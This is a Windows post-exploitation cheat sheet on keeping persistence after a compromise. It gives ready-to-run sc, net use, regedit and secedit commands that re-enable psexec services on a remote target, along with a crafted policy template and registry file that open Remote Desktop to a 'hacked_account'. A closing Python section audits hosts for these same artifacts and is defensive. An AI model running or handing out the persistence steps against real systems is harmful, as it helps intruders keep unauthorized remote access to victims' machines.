
Windows General Persistence Commands

Commands used to maintain persistence on a system after it has been exploited. They are usually run from the context of a cmd.exe or command.exe prompt.

Enable psexec

The psexec tool executes processes on other systems over a network. Most systems now disable the "clipbook" subsystem that psexec requires. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 50), you can re-enable the subsystems needed by psexec with the sc commands below.

    c:\> net use \\target\ipc$ password /user:username
    c:\> sc \\target config netdde start= auto
    c:\> sc \\target config netddedsdm start= auto
    c:\> sc \\target config clipsrv start= auto
    c:\> sc \\target start netdde
    c:\> sc \\target start netddedsdm
    c:\> sc \\target start clipsrv

Enable Remote Desktop

Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 53), you can remotely enable remote desktop using the commands below.

  1. On the compromised system, create a file named fix_ts_policy.ini containing the contents below. Change the "hacked_account" value to the account you have compromised on the remote system.

     [Unicode]
     Unicode=yes
     [Version]
     signature="$CHICAGO$"
     Revision=1
     [Privilege Rights]
     seremoteinteractivelogonright = hacked_account
     seinteractivelogonright = hacked_account
     sedenyinteractivelogonright =
     sedenyremoteinteractivelogonright =
     sedenynetworklogonright =

  2. Create another file named enable_ts.reg containing the contents below.

     Windows Registry Editor Version 5.00
     [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
     "fDenyTSConnections"=dword:00000000
     "TSEnabled"=dword:00000001
     "TSUserEnabled"=dword:00000000
    
  3. On the remote system, execute the following commands:

     c:\> sc config termservice start= auto
     c:\> regedit /s enable_ts.reg
     c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
     c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
     c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
     c:\> gpupdate /Force
     c:\> net start "terminal services"
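From the defender's side, the two files above leave a recognizable trace: a weakened logon-rights section in the local security policy and a Terminal Server registry key with RDP turned on. The following Python is an added example (not part of the original cheat sheet) that audits those two artifacts as text: a security template in the INI format used by secedit /export /cfg (the same format as fix_ts_policy.ini) and a .reg export of the Terminal Server key. The sample inputs are constructed, and the well-known SIDs for Administrators and Remote Desktop Users are assumed to be the only expected grantees of SeRemoteInteractiveLogonRight.

```python
import configparser
import re

# Constructed sample: a secedit-format template after fix_ts_policy.ini was
# applied (a real secedit export is UTF-16; assume it is already decoded).
SAMPLE_TEMPLATE = """\
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyremoteinteractivelogonright =
"""

# Constructed sample: reg export of the Terminal Server key after enable_ts.reg.
SAMPLE_REG = """\
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"""

# Well-known SIDs normally granted SeRemoteInteractiveLogonRight (assumed baseline):
# Administrators (S-1-5-32-544) and Remote Desktop Users (S-1-5-32-555).
EXPECTED_RDP_GRANTEES = {"*S-1-5-32-544", "*S-1-5-32-555"}

def audit_privilege_rights(template_text):
    """Flag RDP logon-right changes in a secedit-format security template."""
    cp = configparser.ConfigParser(interpolation=None)  # option names are lowercased
    cp.read_string(template_text)
    rights = cp["Privilege Rights"] if cp.has_section("Privilege Rights") else {}
    findings = []
    for acct in rights.get("seremoteinteractivelogonright", "").split(","):
        acct = acct.strip()
        if acct and acct not in EXPECTED_RDP_GRANTEES:
            findings.append(f"SeRemoteInteractiveLogonRight granted to {acct}")
    deny = rights.get("sedenyremoteinteractivelogonright")
    if deny is not None and not deny.strip():
        findings.append("SeDenyRemoteInteractiveLogonRight emptied")
    return findings

def audit_terminal_server_reg(reg_text):
    """Flag values in a .reg export that turn Remote Desktop on."""
    text = reg_text.replace("\r\n", "\n")
    values = dict(re.findall(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$', text, re.M))
    findings = []
    if values.get("fDenyTSConnections", "").lower() == "00000000":
        findings.append("fDenyTSConnections=0 (RDP connections allowed)")
    if values.get("TSEnabled", "").lower() == "00000001":
        findings.append("TSEnabled=1 (Terminal Server enabled)")
    return findings
```

Run both functions over a fresh export from the host and compare against a known-good baseline; an unexpected grantee or an emptied deny right is the signal to investigate.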